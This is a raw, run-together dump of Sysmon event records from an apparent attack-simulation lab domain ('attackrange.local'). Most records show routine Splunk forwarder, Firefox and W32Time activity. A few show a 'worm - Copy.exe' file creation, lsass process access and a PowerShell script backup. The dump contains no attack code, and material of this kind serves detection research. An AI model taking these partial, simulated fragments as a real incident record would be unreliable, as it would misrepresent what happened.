Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43F874BCDF6966BF54B13169817A2FA,SHA256=45F979C1C90DDD85BEA818EB3771DDF312E0AF6E26DC74A61703153DBE79FBA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:59.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B5268DBD8639D939789988CFB822CD,SHA256=B4D26068CFA1AB69A3726999DEBCCD5C86E5690D0C552F69307147270C383D5D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001053224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001053223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f7409aa) 13241300x80000000000000001053222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x16372aec) 13241300x80000000000000001053221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x77fb92ec) 13241300x80000000000000001053220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0xd9bffaec) 13241300x80000000000000001053219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001053218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f7409aa) 13241300x80000000000000001053217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x16372aec) 13241300x80000000000000001053216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x77fb92ec) 13241300x80000000000000001053215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0xd9bffaec) 354300x80000000000000001053227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.632{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61913-false10.0.1.12-8000- 23542300x80000000000000001053226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:00.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BCCCBC33397EC189B372988046CFBA,SHA256=713267FC53AEE264AD59555098E7D51B92C1315583CDED8E0A434FA94A494C28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:00.483{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0311B14AF25CFDB040F861E595B54BA6,SHA256=601F1F7F3F8ADD918555AE9A5E0230928BF8E9E3D0D8CD849E0A251BA3308DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:01.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04586F174720D64E15DC5247DE95273A,SHA256=227E42A7B45E9345566CB5135B117B3D8559D51896EBF25A48516C0D7492ED0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:01.483{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEFDEB36C28EEF3A9DFB1E217C2EB74,SHA256=205AE89D3357B05DF6D9002EB2784EAA20FDFC78E37ADD285B8A27BE0FB4FD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:02.841{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6D3ECE26D5EC00532DC9C09A56F826,SHA256=8554A501B12E1556721980793AE21300D7140287B6DF7D8EEC1E190CE4873EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:02.561{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B21751F79439A2DEC4515FB5E8B9382B,SHA256=DC30D2A3FB6D8874ACC13ED3BF652A1FA1281451906418B9210AE1CA9C198F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:03.686{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573C8DD2DAE79C7F5A425FC01C70F358,SHA256=322A177FCECD9E38712C1DDE1DEEA294C9F639919CAF2A9B93BD6E29F88A23B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.842{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3AAEDCA997547D2EE85F88D9B11E7C,SHA256=A5E32A48007B3089B8364442FF842321E2D45F56594E7826783181E2D1A91573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.726{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=18A58B95BCD2C567D4D33DEA9FBD5E42,SHA256=2408F4FCCD3F8ED61F480A51B7BEFC39A450BF0E6F1EB675F47B5BEDCBF955FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:02.193{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57415-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.857{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08335DBFDA3E36CEC639FA61D8F8C02B,SHA256=97A00028676A797F9EDE373F96DC7281BA7E1DDE7E415FD9CA8DBFCD304B0ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:04.717{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF179746358A301C419D342FF928C37F,SHA256=CF61FBBBF3C5F783AF5F852F274D5CFF4E9D8115AE60D63EF959AA7C7F2BFC34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:05.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CF1A21CF6E1D0ACAD7847A0472C5C9,SHA256=3CE644420E6163FCC677AEB7519F92203396C248527F99F8CD3FD9D3E5CD6382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:05.733{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA836D2909548B53DFB44075EFA7CD3,SHA256=EC9004CC943EA59EC0537C2D494F6EDB17153485A098856D8A4991A2FA6335B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9563F36E651DB4B4A6EEB51F427A8EC7,SHA256=C6D7EAA52A8947DCD4E9AD25C4651660E0ED62778C95AE86B4D360D7190C2040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:06.732{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69BF6898CB82A0612975097479507FB,SHA256=265E4F28FD42826943829B01E42F93460A9AE87316670C7CF978ED41B535BFA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.468{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\cache2\indexMD5=50E635DAE2039958C6B8CAA9685626C0,SHA256=693C2B523705EA402F8C588B0CCAD9A84F5581A264D6DE61A3D6BDB8A29964A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.452{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001053237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001053236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1216.169459107C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001053235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:04:06.399{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1216.169459107C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.252{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=1FF55831369444D538ED0D3C320D39C0,SHA256=B523D53F3DB5B8D638F39D73591247CC5553487E2D63197D79D27641C55A1CEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:07.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3370AB61502411B23837BBDCB0D61F,SHA256=D95AE3841719D2E2B8EE308530CA5B1206795019B6841560587C5AF27184529D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:07.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA880371290062FE547DCAB50BC08B7F,SHA256=306A76D30FD344F7BDE06FEB98E009FF56D7A21BA9ECF3E9CDE9E820F9018649,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:58.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61914-false10.0.1.12-8000- 11241100x80000000000000001053242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 08:04:07.185{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\worm - Copy.exe2021-07-12 08:04:07.185 23542300x80000000000000001053245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA71E2D98733D9085B24C5A90D5C8B6,SHA256=FC00C5B3162366EE28E6CEA12BBF6B21BD83AF7CC5DD622527BAC8F8BE45C16F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:08.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ECF1212BCE4E694F252F5BCC4A31EE1,SHA256=980FF6DD0DDFE2FB31DFE60F696A7D6D6E34D7550783EDBE2AFCAA674CEC1497,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:07.241{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57416-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:09.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A121027104889DC23D68E8F17C48286,SHA256=92452D7623233CDBFB8AB69C3BF342962353860EB06E31880F6048AC0F8C6120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:09.779{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DF33F3C261CAF74A8470BEFF12F373,SHA256=69FC955CF68F6ABF2D9DA9363380B1947213CA330037051E18ACABB2801FD5AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:10.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF5D47086CAEC744710532BAA3901A77,SHA256=4D78FA193D44B409912DD4EBBACDD3488993BDE06B292DD393CD9E2C5B1763D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:10.795{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA4FCC5CFC1ED74B3E54A406AF517558,SHA256=91C001788514992C3642D7A7FF89BA86C0CE1B8200BD46328EA03A19C683A9DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:11.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B8B58CB7CCB75D654155E8D85BC7C3,SHA256=0C8E9F3664A87A057E18F3EF1AD2BD680531A4C88AA37636A92D950B4E72D4AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:11.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C14E36A48F2956CDC5F7B9A230D4AC,SHA256=5BCFA75C058CB4E5CC63FB9AB24556C10A8AECBDD8B25DEB5EE984E700FA7421,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61915-false10.0.1.12-8000- 10341000x80000000000000001053248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:11.401{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001053259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71ED55A3A31D86228848C6FCBFADEBAB,SHA256=44E63A6FEECDAF2BB939A456DAEC734A992E62DD9C36184C24DAB957302D5C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:12.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 